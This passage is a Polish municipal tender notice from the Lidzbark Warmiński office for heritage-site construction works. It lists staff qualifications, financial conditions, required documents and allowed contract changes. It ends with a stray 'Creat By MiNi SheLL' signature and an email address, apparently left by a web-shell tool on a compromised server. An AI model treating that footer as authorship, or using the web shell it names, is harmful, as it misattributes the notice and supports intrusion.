- uprawnienia budowlane  do projektowania w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
- co najmniej 3 letnie doświadczenie w projektowaniu,
d)	Osoba 4 - Projektant robót elektrycznych, posiadający:
- uprawnienia budowlane do projektowania w specjalności instalacyjnej 
		w zakresie sieci, instalacji i urządzeń elektrycznych                                                		i elektroenergetycznych  wydane na podstawie aktualnych 			przepisów ustawy Prawo budowlane, lub odpowiadające im ważne 		uprawnienia budowlane, które zostały wydane na 	podstawie 			wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w projektowaniu,
e)	Osoba 5 - Projektant robót drogowych, posiadający:
- uprawnienia budowlane do projektowania w specjalności drogowej wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w projektowaniu,
f)	Osoba 6 - Kierownik budowy, posiadający:
- Uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń  w specjalności konstrukcyjno - budowlanej wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 5 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
- co najmniej 2 -letnią praktykę zawodową odbytą na budowie przy zabytkach nieruchomych,  
g)	Osoba 7 - Kierownik robót sanitarnych, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi                        w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
h)	Osoba 8 - Kierownik robót elektrycznych, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi                         w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
i)	Osoba 9 - Kierownik robót drogowych, posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi                              w specjalności drogowej wydane na podstawie aktualnych przepisów ustawy Prawo budowlane, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- co najmniej 3 letnie doświadczenie w kierowaniu budową lub robotami budowlanymi, lub w wykonywaniu nadzoru inwestorskiego,
j)	Osoba 10 - Kierownik badań i prac konserwatorskich, posiadający: tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku konserwacja i restauracja dzieł sztuki lub wyższych studiów w specjalności                     w zakresie konserwacji zabytków oraz odbył po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji i badania zabytków,
k)	Osoba 11 - Kierownik badań i prac archeologicznych, posiadający: tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów na kierunku archeologia oraz odbył po ukończeniu tych studiów co najmniej 12- miesięczną praktykę zawodową w zakresie badań archeologicznych.
l)	Osoba 12 - Kierownik prac konserwatorskich zieleni zabytkowej, posiadający: tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów obejmujących wiadomości z zakresu prac konserwatorskich lub prac restauratorskich polegających na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej oraz odbył po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową przy konserwacji i pielęgnacji tego rodzaju zabytków,

             	Osoby, które uzyskały kwalifikacje do wykonywania samodzielnych funkcji 		technicznych w Rzeczypospolitej Polskiej, muszą być wpisane na listę 			członków  właściwej izby samorządu zawodowego i ubezpieczone od 			odpowiedzialności cywilnej, co daje prawo wykonywania samodzielnych 			funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 15.12.2000 r. 		o samorządach zawodowych architektów, inżynierów budownictwa oraz 			urbanistów (Dz. U. z 2001 r., Nr 5, poz. 42 z późn. zm.). Oprócz osób, 
		o których mowa wyżej w wykonaniu zamówienia mogą wziąć udział również 		osoby, będące obywatelami państw Europejskiego Obszaru Gospodarczego 		oraz Konfederacji Szwajcarskiej, spełniający  wymagania zawarte  w ustawie  		z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623, 		z późn. zm.), a w szczególności w art. 12a oraz  w ustawie z dnia 18 marca 		2008 r. o  zasadach uznawania kwalifikacji zawodowych nabytych                    		w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 Nr 63, poz. 394).
		Wymienione w ust. 1 pkt. 1.3 osoby nie wyczerpują wymagań dla rzetelnego 		wypełnienia zobowiązań Wykonawcy i powinny być traktowane jako minimalne 		wymagania Zamawiającego. Wykonawca powinien zapewnić swoim 
		specjalistom 	niezbędne wsparcie i pomoc techniczną ze strony innych 			specjalistów, którzy mogą być niezbędni do właściwego wykonania umowy 		(np. dodatkowi kierownicy danej branży, uprawniony geodeta, radca 			prawny, hydrogeolog, geolog, specjalista ds. zieleni, ekspert ppoż., 			inżynier materiałowy, specjalista ochrony placu budowy, 	administrator, itp.). 		Wykonawca uwzględni w ofercie każdą konieczność uzupełnienia 			zespołu specjalistów wynikającą z przepisów prawa, decyzji, uzgodnień                        		i porozumień, 	które są niezbędne do kompleksowej realizacji zamówienia. 		Kompletne 	wynagrodzenie całego personelu oraz wszelkie koszty 			związane z obsługą muszą 	być zawarte w cenie oferty Wykonawcy.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca  spełnia niniejszy warunek, jeżeli wykonawca 	wykaże, że:
	1) posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 	    działalności związanej z przedmiotem niniejszego zamówienia, na kwotę nie 
               niższą niż  2 000 000,00 zł  (słownie:  dwa miliony złotych).
	2) posiada środki finansowe lub zdolność kredytową w wysokości co najmniej  
    1000 000,00 zł (słownie: jeden milion złotych).
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą   
wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony według wzoru stanowiącego  załącznik nr 1 do IDW,
2. Wypełniony Wykaz cen, wg wzoru określonego w Części IV SIWZ,
3. Załącznik do oferty, wg wzoru stanowiącego załącznik nr 1a do IDW,
4. Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty 
      nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku 	Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument 	ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 	zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	niniejszego zamówienia publicznego.
5. Kopię dowodu wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, niezależnych od woli stron, a w szczególności:
1) wystąpienie siły wyższej  (np. klęski żywiołowe, strajki generalne lub lokalne) mającej  
    bezpośredni wpływ na terminowość realizacji umowy,
2) okoliczności niezależne od stron uniemożliwiające realizację przedmiotu umowy 
    w terminie, a w szczególności:
a) wystąpienie warunków atmosferycznych odbiegających od typowych,    
    uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób                         
     i sprawdzeń, dokonywanie odbiorów,
b) wystąpienie nieprzewidzianych w SIWZ warunków geologicznych, archeologicznych lub 
    terenowych, w szczególności: niewypały i niewybuchy, wykopaliska archeologiczne,
c) zmiana zakresu robót budowlanych, wystąpienie robót zamiennych  lub dodatkowych 
    od wykonania których uzależnione jest wykonanie zamówienia podstawowego,
d) wystąpienie przestojów robót budowlanych spowodowanych wstrzymaniem wykonania 
     robót przez uprawnione organy, z przyczyn nie wynikających z winy Stron umowy.
3) W przypadku zaistnienia okoliczności, o których mowa w ust. 1 pkt.1 lub 2 termin 
    realizacji przedmiotu umowy może ulec wydłużeniu o okres trwania tych okoliczności 
    lub o czas niezbędny do należytego wykonania przedmiotu umowy.
4) Zmiana umowy może również nastąpić w przypadku:
a)  zmiany przepisów prawa mających wpływ na treść umowy,
b)  nie przyznania środków pochodzących z budżetu Unii Europejskiej na dofinansowanie    
     projektu, wówczas przedmiot umowy zostanie zrealizowany  tylko w zakresie etapu I, 
     a wysokość wynagrodzenia  zostanie zmniejszona o wartość robót budowlanych 
     wchodzących w zakres II etapu.
c) ograniczenia zakresu robót lub usług, wysokość wynagrodzenia Wykonawcy może być 
    zmniejszona o wartość usług lub robót niewykonanych.
d) nie wykonania części  lub całości zamówienia z powodu tego, że wykonanie 
    zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili 
    zawarcia umowy wysokość wynagrodzenia Wykonawcy zostanie zmniejszona o wartość 
    robót lub usług niewykonanych.
e) Zmiany osób biorących udział w realizacji przedmiotu umowy, na osoby o kwalifikacjach                       
     i  doświadczeniu nie mniejszym niż osoby wymienione w ofercie wykonawcy.
f) W przypadku zmiany osób reprezentujących strony,
g) W przypadku wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy 
    zgodnie z SIWZ,
h) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na 
   skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub 
   wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 12:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt przewidywany do dofinansowania ze środków  Europejskiego Funduszu Rozwoju Regionalnego w ramach:
Osi Priorytetowej 2 - Turystyka,
Działanie 2.1 - Wzrost potencjału turystycznego,
Poddziałanie 2.1.5 - Dziedzictwo kulturowe,
Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com